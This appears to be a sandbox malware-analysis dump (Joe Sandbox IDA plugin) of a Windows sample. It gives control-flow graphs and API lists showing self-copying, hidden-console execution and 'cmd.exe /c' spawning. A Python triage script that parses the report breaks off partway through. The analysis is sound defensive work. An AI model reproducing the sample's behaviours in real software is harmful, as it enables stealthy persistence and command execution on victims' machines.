                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,00000000), ref: 00B37A2A
                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,00000000), ref: 00B37A35
                                                                                                        • WaitForSingleObject.KERNEL32(?,00000000,?,?,?,?,?,00000000,00000000), ref: 00B37A4F
                                                                                                        • GetExitCodeProcess.KERNEL32(?,?), ref: 00B37A5C
                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,00000000), ref: 00B37A6D
                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,00000000), ref: 00B37A78
                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,00000000), ref: 00B37A8D
                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,00000000), ref: 00B37A98
                                                                                                        • _free.LIBCMT ref: 00B37AA3
                                                                                                        • _free.LIBCMT ref: 00B37AAF
                                                                                                        • _free.LIBCMT ref: 00B37ABB
                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,00000000), ref: 00B37AC9
                                                                                                        • _free.LIBCMT ref: 00B37943
                                                                                                          • Part of subcall function 00B34D66: RtlFreeHeap.NTDLL(00000000,00000000,?,00B3D5F8,?,00000000,?,00000000,?,00B3D89C,?,00000007,?,?,00B3DC90,?), ref: 00B34D7C
                                                                                                          • Part of subcall function 00B34D66: GetLastError.KERNEL32(?,?,00B3D5F8,?,00000000,?,00000000,?,00B3D89C,?,00000007,?,?,00B3DC90,?,?), ref: 00B34D8E
                                                                                                        • _free.LIBCMT ref: 00B37994
                                                                                                        • _free.LIBCMT ref: 00B3799F
                                                                                                        • _free.LIBCMT ref: 00B379AA
                                                                                                        • _free.LIBCMT ref: 00B37AD2
                                                                                                        • _free.LIBCMT ref: 00B37ADE
                                                                                                        • _free.LIBCMT ref: 00B37AEA
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _free$CloseHandle$ErrorLastProcess$CodeCreateExitFreeHeapObjectSingleWait__dosmaperr
                                                                                                        • String ID:
                                                                                                        • API String ID: 4143445633-0
                                                                                                        • Opcode ID: f3a34523397d83e4209f6b2a57bdda3e01fbb080bcb86d02e816fe9c45438810
                                                                                                        • Instruction ID: f73b72afe94ddb7aa785c696bfd26e2cc284e7373ec6f21e5645fb8413bbbc68
                                                                                                        • Opcode Fuzzy Hash: f3a34523397d83e4209f6b2a57bdda3e01fbb080bcb86d02e816fe9c45438810
                                                                                                        • Instruction Fuzzy Hash: DF616EB1C04209BBDF21AFA4DC85AEEBBF9EF44311F2441A6F815A2251DB355B84CB61

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 6433 a83100-a8317f call aa9b40 6436 a83182-a8318b 6433->6436 6436->6436 6437 a8318d-a831a4 call aa6c20 6436->6437 6440 a831a7-a831b0 6437->6440 6440->6440 6441 a831b2-a83244 call aa80d0 * 2 6440->6441 6446 a83278-a83296 6441->6446 6447 a83246-a83258 6441->6447 6448 a83298-a832ad 6446->6448 6449 a832cd-a8330b 6446->6449 6450 a8325a-a83268 6447->6450 6451 a8326e-a83275 call b00c3c 6447->6451 6452 a832af-a832bd 6448->6452 6453 a832c3-a832ca call b00c3c 6448->6453 6454 a83310-a83319 6449->6454 6450->6451 6455 a83578 call b25132 6450->6455 6451->6446 6452->6453 6452->6455 6453->6449 6454->6454 6458 a8331b-a8336f call aa6c20 call aa80d0 6454->6458 6463 a8357d call b25132 6455->6463 6470 a83371-a83386 6458->6470 6471 a833a6-a833c0 GetFileAttributesW 6458->6471 6467 a83582-a83587 call b25132 6463->6467 6475 a83388-a83396 6470->6475 6476 a8339c-a833a3 call b00c3c 6470->6476 6473 a83400-a8340a GetFileAttributesW 6471->6473 6474 a833c2-a833d3 CreateDirectoryW 6471->6474 6480 a8340c-a83417 CreateDirectoryW 6473->6480 6481 a83441-a83447 6473->6481 6478 a833dc-a833e1 CreateDirectoryW 6474->6478 6479 a833d5-a833da CreateDirectoryW 6474->6479 6475->6463 6475->6476 6476->6471 6483 a833e3-a833f4 CreateDirectoryW * 3 6478->6483 6484 a833f6-a833fe CreateDirectoryW 6478->6484 6479->6478 6485 a83419-a83428 CreateDirectoryW * 2 6480->6485 6486 a8342a 6480->6486 6487 a83449-a8345b 6481->6487 6488 a8347b-a83495 6481->6488 6483->6481 6484->6481 6493 a83430-a8343a GetFileAttributesW 6485->6493 6486->6493 6489 a8345d-a8346b 6487->6489 6490 a83471-a83478 call b00c3c 6487->6490 6491 a834c9-a834e3 6488->6491 6492 a83497-a834a9 6488->6492 6489->6467 6489->6490 6490->6488 6497 a83513-a8352d 6491->6497 6498 a834e5-a834f7 6491->6498 6495 a834ab-a834b9 6492->6495 6496 a834bf-a834c6 call b00c3c 6492->6496 6493->6481 6499 a8343c-a8343f CreateDirectoryW 6493->6499 6495->6467 6495->6496 6496->6491 6500 a8355d-a83577 call b005bb 6497->6500 6501 a8352f-a83541 6497->6501 6504 a83509-a83510 call b00c3c 6498->6504 6505 a834f9-a83507 6498->6505 6499->6481 6506 a83553-a8355a call b00c3c 6501->6506 6507 a83543-a83551 6501->6507 6504->6497 6505->6467 6505->6504 6506->6500 6507->6467 6507->6506
                                                                                                        APIs
                                                                                                        • GetFileAttributesW.KERNEL32(?,AppData\,00000008,?,?,00B6B058,00000001,?,?,?,?,00000000), ref: 00A833B7
                                                                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 00A833CD
                                                                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 00A833D8
                                                                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 00A833DD
                                                                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 00A833E5
                                                                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 00A833ED
                                                                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 00A833F2
                                                                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 00A833FC
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateDirectory$AttributesFile
                                                                                                        • String ID: :\Users\$AppData\
                                                                                                        • API String ID: 689033430-659903382
                                                                                                        • Opcode ID: 3bf5034eec0f48c71d6db8f866418342091335d4d09ae364cb097a8e9805a22a
                                                                                                        • Instruction ID: 88f28aad4fce5bbb2c8681013488807c5fc8cf657ba2f313715c758da3b3f272
                                                                                                        • Opcode Fuzzy Hash: 3bf5034eec0f48c71d6db8f866418342091335d4d09ae364cb097a8e9805a22a
                                                                                                        • Instruction Fuzzy Hash: BDD1E431A102189FDF18EF64CD85BADBB72FF85705F10825CE409AB291DB74AB85CB50

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 6607 a9a6a0-a9bdbd call aa7a00 call aa6c20 * 2 call aa12d0 call a78920 call aa6c20 * 2 call aa12d0 call a78920 call aa6c20 * 2 call aa12d0 call a78920 call aa6c20 * 2 call aa12d0 call a78920 call aa8080 call b25132 call aa1800 call b21700 6663 a9c10b-a9c111 6607->6663 6664 a9bdc3-a9bead call b21daa call b18980 call aa8b80 call aa7b00 call aa8620 6607->6664 6665 a9c13b-a9c155 call b005bb 6663->6665 6666 a9c113-a9c11f 6663->6666 6693 a9beaf-a9bec3 6664->6693 6694 a9bec5-a9bed1 6664->6694 6668 a9c131-a9c138 call b00c3c 6666->6668 6669 a9c121-a9c12f 6666->6669 6668->6665 6669->6668 6672 a9c160-a9c1ce call b25132 call b01740 GetConsoleWindow ShowWindow 6669->6672 6687 a9c269-a9c317 call aa90a0 * 4 6672->6687 6688 a9c1d4-a9c20d call aa1800 6672->6688 6734 a9c322-a9c329 6687->6734 6699 a9c210-a9c237 call aa1940 * 2 6688->6699 6697 a9bed4-a9bef4 call a73740 call aaafb0 6693->6697 6694->6697 6713 a9befa 6697->6713 6714 a9bfee-a9bffb 6697->6714 6712 a9c239-a9c264 call aa1c10 call a968a0 call aa1ac0 6699->6712 6712->6734 6719 a9bf00-a9bf17 6713->6719 6716 a9bffd-a9bfff 6714->6716 6717 a9c001-a9c025 call aa7930 call b21daa 6714->6717 6722 a9c028-a9c039 call aa7a00 6716->6722 6717->6722 6725 a9bf19-a9bf1e 6719->6725 6726 a9bf36-a9bf75 call aaa5b0 call a88240 6719->6726 6745 a9c03b-a9c060 call a73740 6722->6745 6746 a9c065-a9c0e1 call aa47b0 call ae8cbf 6722->6746 6731 a9bf24-a9bf34 6725->6731 6732 a9c156 call aa8080 6725->6732 6756 a9bf87-a9bf8d call aab5f0 6726->6756 6757 a9bf77-a9bf85 call aa12d0 6726->6757 6731->6719 6740 a9c15b call b25132 6732->6740 6743 a9c32f-a9c343 6734->6743 6744 a9c422-a9c44e call a78780 call aa13c0 6734->6744 6740->6672 6752 a9c382-a9c385 6743->6752 6753 a9c345-a9c348 6743->6753 6783 a9c510-a9c852 call a82870 GetModuleFileNameW call aa1260 call a836f0 call a83590 call aa11d0 call a749c0 call aa9b40 call aa9c10 call aa9ad0 call a749c0 * 2 call aa1090 * 2 CopyFileW call aa9b40 call aa9c10 call aa9ad0 call a749c0 * 2 call aa1090 * 2 CopyFileW call aa10a0 call aa10c0 call aaa4d0 call aa8f40 call aa9580 call aa1ac0 call aa8f40 call aa9580 call aa1ac0 call aa1660 call a78780 call aa1ac0 call aa1660 call a78780 call aa1ac0 call aa10a0 call aa10c0 call aaa4d0 call aa8f40 call aa9580 call aa1ac0 call aa1660 call a78780 call aa1ac0 call a93dd0 call a78780 call aa13c0 call aa12d0 call a83100 6744->6783 6784 a9c454-a9c50b call aa13c0 * 2 call aa1360 call aa9040 call aa9580 call aa1ac0 * 2 call aa1660 call a78780 call aa1ac0 * 2 6744->6784 6745->6746 6746->6663 6778 a9c0e3-a9c0ef 6746->6778 6760 a9c3c2-a9c3c5 6752->6760 6761 a9c387-a9c38a 6752->6761 6759 a9c350-a9c35a 6753->6759 6774 a9bf92-a9bf9c 6756->6774 6757->6774 6759->6759 6768 a9c35c-a9c37d 6759->6768 6763 a9c3fd-a9c41c SetErrorMode SetConsoleTitleW call a858e0 6760->6763 6764 a9c3c7-a9c3ca 6760->6764 6769 a9c390-a9c39a 6761->6769 6763->6744 6788 a9e585-a9e5a2 call b005bb 6763->6788 6771 a9c3d0-a9c3da 6764->6771 6768->6752 6769->6769 6776 a9c39c-a9c3bd 6769->6776 6771->6771 6779 a9c3dc-a9c3f9 6771->6779 6781 a9bf9e-a9bfb0 6774->6781 6782 a9bfd0-a9bfe8 call aaafb0 6774->6782 6776->6760 6785 a9c101-a9c108 call b00c3c 6778->6785 6786 a9c0f1-a9c0ff 6778->6786 6779->6763 6789 a9bfb2-a9bfc0 6781->6789 6790 a9bfc6-a9bfcd call b00c3c 6781->6790 6782->6714 6782->6719 6917 a9c854-a9c85b 6783->6917 6918 a9c8b6-a9c8cb call a85d90 * 2 6783->6918 6784->6783 6785->6663 6786->6740 6786->6785 6789->6740 6789->6790 6790->6782 6917->6918 6920 a9c85d-a9c864 6917->6920 6927 a9c8cd-a9c8ec call a85d90 * 2 6918->6927 6928 a9c8f2-a9ca02 call aa10a0 call aa10c0 call aaa4d0 call aa1a90 call a78a80 call aa11d0 call a749c0 call aa10a0 call aa10c0 call aaa4d0 call a78a80 call aa9d90 call aa11d0 call a749c0 * 2 call a84500 call aa12b0 6918->6928 6920->6918 6922 a9c866-a9c872 call aaafa0 6920->6922 6922->6918 6929 a9c874-a9c8b3 call aa12d0 * 2 call a792a0 6922->6929 6927->6928 6974 a9ca04-a9ca06 6928->6974 6929->6918 6975 a9cad8-a9cb15 call aa12d0 call a74a20 call a749c0 6974->6975 6976 a9ca0c-a9caca call aa9b40 call aa9c10 call aa9ad0 call aa11d0 call a749c0 * 3 call aa12d0 call a74a20 call a749c0 6974->6976 6990 a9cb92-a9cbb5 call aa9b40 6975->6990 6991 a9cb17-a9cb8d call aa9b40 call aa9c10 call aa9ad0 call aa11d0 call a749c0 * 3 6975->6991 6976->6975 7044 a9cacc-a9cad3 6976->7044 6999 a9cbbc-a9cbf0 call aa12d0 call a74a20 6990->6999 7000 a9cbb7 call a90fa0 6990->7000 6991->6990 7015 a9cc32 6999->7015 7016 a9cbf2-a9cc30 call aa12d0 call a74a20 6999->7016 7000->6999 7021 a9cc39-a9cc41 7015->7021 7016->7015 7016->7021 7026 a9cc5d-a9cc7f call a749c0 7021->7026 7027 a9cc43-a9cc57 call a749c0 7021->7027 7038 a9d02b-a9d1f1 call b18980 call aa37b0 call aa9130 call a73730 call aa3740 call b18980 call a85e60 call ab5c80 call b18980 call a9e5b0 call b18980 call a9e750 call aa0230 call ab2590 call aa0230 call ab23c0 7026->7038 7039 a9cc85-a9ccc2 call aa12d0 call a74a20 call a749c0 7026->7039 7027->7026 7114 a9d1f7-a9d200 7038->7114 7056 a9ccc4-a9ccd1 call aa11a0 7039->7056 7057 a9ccd6-a9ccdc 7039->7057 7044->6974 7056->7057 7060 a9cce0-a9ccfb call aa12d0 call a7aed0 7057->7060 7069 a9cd0d-a9d026 call b18980 call aa3b00 call aa0cc0 call aaae30 call aa3a90 call aa1bd0 * 2 call aa1400 * 2 call aa1360 call aa1b10 call aa1ac0 call aa1360 call aa1b10 call aa1ac0 call aa13c0 * 2 call aa1360 call aa16c0 call aa16e0 call aaa5b0 call aa1170 call aa11a0 call aa13c0 * 2 call aa1360 call aa16c0 call aa16e0 call aaa5b0 call aa11a0 call a77fe0 call aa1b10 call aa1ac0 call aa1a60 call aa1a90 call aa1ac0 call a749c0 call aa1ac0 call a749c0 call aa1ac0 * 4 call a7ac80 7060->7069 7070 a9ccfd 7060->7070 7251 a9d82e-a9d891 call b18980 call a776c0 call ab1ba0 call aa1260 call aa0e90 7069->7251 7072 a9ccff-a9cd02 7070->7072 7073 a9cd04-a9cd0b Sleep 7070->7073 7072->7069 7072->7073 7073->7060 7114->7114 7116 a9d202-a9d26e call a77e30 call aa1b10 call aa1ac0 call aa1360 * 2 7114->7116 7139 a9d270-a9d279 7116->7139 7139->7139 7141 a9d27b-a9d291 call aa1a90 7139->7141 7146 a9d297-a9d2a0 7141->7146 7146->7146 7148 a9d2a2-a9d2c1 call a83f00 7146->7148 7154 a9d2c6-a9d2cf 7148->7154 7154->7154 7156 a9d2d1-a9d30a call aa95d0 call aa1b10 call aa1ac0 7154->7156 7171 a9d310-a9d319 7156->7171 7171->7171 7173 a9d31b-a9d825 call aa1c10 call a77e30 call aa1b10 call aa1ac0 call b18980 call aa37b0 call aa8f40 call aa9580 call aa9470 call a73730 call aa1ac0 * 2 call aa3740 call aa10a0 call aa10c0 call aaa4d0 call b18980 call aa37b0 call aa9490 call aa9470 call aa1ac0 call aa9490 call aa9470 call aa1ac0 call aa3740 call aa1c10 call a84670 call aa9b40 call aa9c10 call aa9ad0 call a749c0 * 2 call b18980 call aa3b00 call a73730 call aa3a90 call aa12d0 call a91c90 call a7ac80 call a749c0 call aa1ac0 * 2 call a7b040 call aa1ac0 call a7b040 call aa1ac0 * 5 call a77d70 call a86020 * 2 7171->7173 7173->7251 7395 a9d829 call a7b040 7173->7395 7273 a9d8a3-a9dba9 call aa9de0 call aa9ad0 call aa9c10 call aa9ad0 call aa9c10 call aa9ad0 call aa9c10 call aa9ad0 call aa9c10 call aa9ad0 call aa11d0 call a749c0 * 10 call aa1bd0 call aa1660 call b25282 call aa1bd0 call aa1660 call b25282 call aa9de0 call aa9ad0 call aa9c10 call aa9ad0 call aa9c10 call aa9ad0 call aa9c10 call aa9ad0 call aa11d0 call a749c0 * 8 call aa90a0 7251->7273 7274 a9d893-a9d89e call aa1170 7251->7274 7426 a9dbaf-a9dbc0 call a7f5e0 7273->7426 7427 a9dd17-a9dd28 call aa90a0 7273->7427 7274->7273 7395->7251 7432 a9e4a4-a9e580 call a78780 call aa1ac0 * 3 call a749c0 call a778d0 call a749c0 * 2 call aa1ac0 * 8 call a749c0 * 3 call aa1ac0 7426->7432 7433 a9dbc6-a9dcb7 call aa9b40 call aa9c10 call aa9ad0 call aa9c10 call aa9ad0 call aa9c10 call a749c0 * 5 call aa1090 * 2 call b259c6 7426->7433 7434 a9dd2e-a9e0a3 call a75130 * 2 call aa0e30 call aa12d0 call aaa750 call aaa940 call aa0e30 call aa12d0 call aaa750 call aaa940 call aa0e30 call aa12d0 call aaa750 call aaa940 call aa0e30 call aa12d0 call aaa750 call aaa940 call aa0e30 call aa12d0 call aaa750 call aaa940 call a75330 call aa0e30 call aa12d0 call aaa750 call aaa940 call aa0e30 call aa12d0 call aaa750 call aaa940 call aa0e30 call aa12d0 call aaa750 call aaa940 call aa0e30 call aa12d0 call aaa750 call aaa940 call aa0e30 call aa12d0 call aaa750 call aaa940 call a75330 7427->7434 7435 a9e450-a9e461 call aa90a0 7427->7435 7432->6788 7538 a9dcb9-a9dd00 call aa9c70 call aa11d0 call a749c0 call aa1090 * 2 call b259c6 7433->7538 7539 a9dd03-a9dd12 call a749c0 7433->7539 7624 a9e0a9-a9e42f call a75130 * 2 call aa0e30 call aa12d0 call aaa750 call aaa940 call aa0e30 call aa12d0 call aaa750 call aaa940 call aa0e30 call aa12d0 call aaa750 call aaa940 call aa0e30 call aa12d0 call aaa750 call aaa940 call aa0e30 call aa12d0 call aaa750 call aaa940 call a75330 call aa0e30 call aa12d0 call aaa750 call aaa940 call aa0e30 call aa12d0 call aaa750 call aaa940 call aa0e30 call aa12d0 call aaa750 call aaa940 call aa0e30 call aa12d0 call aaa750 call aaa940 call aa0e30 call aa12d0 call aaa750 call aaa940 call a75330 call a75240 * 2 7434->7624 7625 a9e434-a9e44e call a75240 * 2 7434->7625 7444 a9e491-a9e49d call a8f570 7435->7444 7445 a9e463-a9e478 call a8daf0 * 2 7435->7445 7444->7432 7459 a9e49f 7444->7459 7445->7432 7470 a9e47a-a9e48f call a8daf0 * 2 7445->7470 7459->7432 7464 a9e49f call a8f570 7459->7464 7464->7432 7470->7432 7538->7539 7539->7432 7624->7625 7625->7432
                                                                                                        APIs
                                                                                                          • Part of subcall function 00A73740: __CxxThrowException@8.LIBVCRUNTIME ref: 00A7376D
                                                                                                          • Part of subcall function 00A73740: __CxxThrowException@8.LIBVCRUNTIME ref: 00A737B2
                                                                                                        • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00A9BB9D
                                                                                                        • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00A9BC1E
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Exception@8Ios_base_dtorThrowstd::ios_base::_
                                                                                                        • String ID: ",$ ::$ ="$", $($:: $=" $X$c:\skips.txt
                                                                                                        • API String ID: 532691672-3191169177
                                                                                                        • Opcode ID: fdb2722782b45cb75cc520690f477b4a148cd6652ea42d262d15f3dbaf4bfa5b
                                                                                                        • Instruction ID: da5c17b03bdf5e94bc18421947ab3a845adcf884eae6502371f7d7d6290424f6
                                                                                                        • Opcode Fuzzy Hash: fdb2722782b45cb75cc520690f477b4a148cd6652ea42d262d15f3dbaf4bfa5b
                                                                                                        • Instruction Fuzzy Hash: 85E2F470A203499BDF14EF74CE897DDBBB1AF45308F20868DD404AB291DB75AB84CB91

                                                                                                        Control-flow Graph
                                                                                                        • Entry 0xB24832 (nodes 8044-8107)
                                                                                                        • Win32 APIs in node labels: GetCurrentProcess, DuplicateHandle (0xB24832-0xB24879); CreateProcessA (0xB249BB-0xB249F7); CloseHandle (0xB24A00-0xB24A18 and 0xB24A56-0xB24A59)
                                                                                                        • Internal callees: 0xB358DE, 0xB3723E, 0xB24C8C, 0xB24ACB, 0xB18980, 0xB34D09, 0xB321C2, 0xB36BE9, 0xB24B09, 0xB34D66, 0xB2514F, 0xB21DAA
                                                                                                        • Paths: a DuplicateHandle failure (0xB2487B) skips straight to the CloseHandle epilogue at 0xB24A50; failures out of the 0xB321C2 and 0xB36BE9 calls lead to 0xB24A68 (call 0xB2514F, the TerminateProcess helper listed under APIs); the success path reaches CreateProcessA at 0xB249BB.
                                                                                                        APIs
                                                                                                        • GetCurrentProcess.KERNEL32 ref: 00B2483D
                                                                                                        • DuplicateHandle.KERNELBASE(00000000,?,00000000,000000FF,00000000,00000001,00000002), ref: 00B24871
                                                                                                        • CloseHandle.KERNEL32(000000FF), ref: 00B24A59
                                                                                                          • Part of subcall function 00B2514F: IsProcessorFeaturePresent.KERNEL32(00000017,00B25121,?,?,00A71F07,?,?,00000016,?,?,00B2512E,00000000,00000000,00000000,00000000,00000000), ref: 00B25151
                                                                                                          • Part of subcall function 00B2514F: GetCurrentProcess.KERNEL32(C0000417,?,?,?), ref: 00B25173
                                                                                                          • Part of subcall function 00B2514F: TerminateProcess.KERNEL32(00000000), ref: 00B2517A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Process$CurrentHandle$CloseDuplicateFeaturePresentProcessorTerminate
                                                                                                        • String ID: /c $D$cmd.exe
                                                                                                        • API String ID: 1167604731-1597775715
                                                                                                        • Opcode ID: a18420b6c2736dc7382bcbb102d8683beec6395a5be1971e0a9951ea5807ef05
                                                                                                        • Instruction ID: ebf3a51b0198da9cfbe79a0c94bf801d9553cc052d50660339a80af67c65a5fd
                                                                                                        • Opcode Fuzzy Hash: a18420b6c2736dc7382bcbb102d8683beec6395a5be1971e0a9951ea5807ef05
                                                                                                        • Instruction Fuzzy Hash: 4C71F731E00619AFDB21CFA8EC45AAEBBF5EF46350F2001A9F409A7251E7319E45CF50
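Reading a block like the one above by hand is slow, and its two evidence sources disagree: the graph node 0xB249BB-0xB249F7 is labelled CreateProcessA, yet the APIs list never mentions it, and block 0xB38AA3 further down carries ReadFile, ReadConsoleW and GetConsoleMode in its graph while its API ID is empty. The script below is an added example written for this report, not Joe Sandbox code. It parses one block of the format shown here (the graph dump, the APIs list with its "Part of subcall function" entries, the .sdmp descriptor and the "$"-joined String ID) into a record, unions the API names from both sources, decodes the memory-region descriptor, and applies one triage rule: a CreateProcess* export reachable from the block together with a "cmd.exe" string. The sample input is a constructed, cut-down copy of the 0xB24832 block. All function and field names are mine, and reading fields 4 and 6 of the .sdmp name as the PAGE_* protection and MEM_* type is an assumption; it fits this report, where the code region decodes to PAGE_EXECUTE_READ / MEM_IMAGE and is marked "based on PE: true".

```python
import re
from collections import namedtuple
from dataclasses import dataclass, field

# Constructed input: the 0xB24832 block above, cut down to the lines the parser uses.
SAMPLE_BLOCK = """\
control_flow_graph 8044 b24832-b24879 GetCurrentProcess DuplicateHandle 8045 b24882-b2489f call b358de call b3723e 8044->8045 8104 b249bb-b249f7 CreateProcessA 8101->8104 8105 b24a00-b24a18 CloseHandle 8104->8105
APIs
• GetCurrentProcess.KERNEL32 ref: 00B2483D
• DuplicateHandle.KERNELBASE(00000000,?,00000000,000000FF,00000000,00000001,00000002), ref: 00B24871
• CloseHandle.KERNEL32(000000FF), ref: 00B24A59
  • Part of subcall function 00B2514F: TerminateProcess.KERNEL32(00000000), ref: 00B2517A
Memory Dump Source
• Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
Similarity
• String ID: /c $D$cmd.exe
"""

# Real winnt.h values; that .sdmp name fields 4 and 6 carry them is an assumption that fits
# this report (0x20 and 0x1000000 for the code region, which is also "based on PE: true").
PAGE_PROTECT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
                0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}
HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
HEX_RANGE = re.compile(r"^[0-9a-f]+-[0-9a-f]+$")          # a CFG node label "start-end"
API_LINE = re.compile(r"^•\s*(?:Part of subcall function [0-9A-F]+:\s*)?"
                      r"([\w:@~]+)\.(\w+)(?:\([^)]*\))?,?\s*ref:\s*([0-9A-F]+)")
SDMP_LINE = re.compile(r"Source File:\s*(\S+)\.sdmp,.*based on PE:\s*(true|false)")

ApiRef = namedtuple("ApiRef", "name module ref direct")   # direct=False for subcall entries
Region = namedtuple("Region", "base protect kind based_on_pe")

@dataclass
class Block:
    entry: int = 0
    cfg_apis: list = field(default_factory=list)     # Win32 names taken from CFG node labels
    api_refs: list = field(default_factory=list)     # ApiRef records from the APIs list
    strings: list = field(default_factory=list)
    region: Region = None

    def api_names(self):
        # Union of both sources: in this report the APIs list omits CreateProcessA even
        # though the graph node 0xB249BB-0xB249F7 is labelled with it.
        return {a.name for a in self.api_refs} | set(self.cfg_apis)

def _parse_cfg(text, blk):
    toks = text.split()[1:]                    # drop the "control_flow_graph" keyword
    i = 0
    while i < len(toks):
        t = toks[i]
        if HEX_RANGE.match(t):
            if not blk.entry:                  # the first node listed is the function entry
                blk.entry = int(t.split("-")[0], 16)
        elif t == "call":
            i += 1                             # skip the callee address
        elif re.match(r"^[A-Z][\w@]*$", t):    # exports are CamelCase; node ids and edges are not
            blk.cfg_apis.append(t)
        i += 1

def parse_block(text):
    blk, state, cfg = Block(), None, []
    for raw in text.splitlines():
        line = raw.strip()                     # note: also drops a trailing space on the last string
        if not line:
            continue
        if line.startswith("control_flow_graph"):
            state, cfg = "cfg", [line]
        elif line in HEADERS:
            state = line
        elif state == "cfg":
            cfg.append(line)                   # the graph dump may wrap onto further lines
        elif state == "APIs":
            m = API_LINE.match(line)
            if m:
                blk.api_refs.append(ApiRef(m.group(1), m.group(2), int(m.group(3), 16),
                                           "Part of subcall" not in line))
        elif state == "Memory Dump Source":
            m = SDMP_LINE.search(line)
            if m and blk.region is None:       # the first entry is the region holding this code
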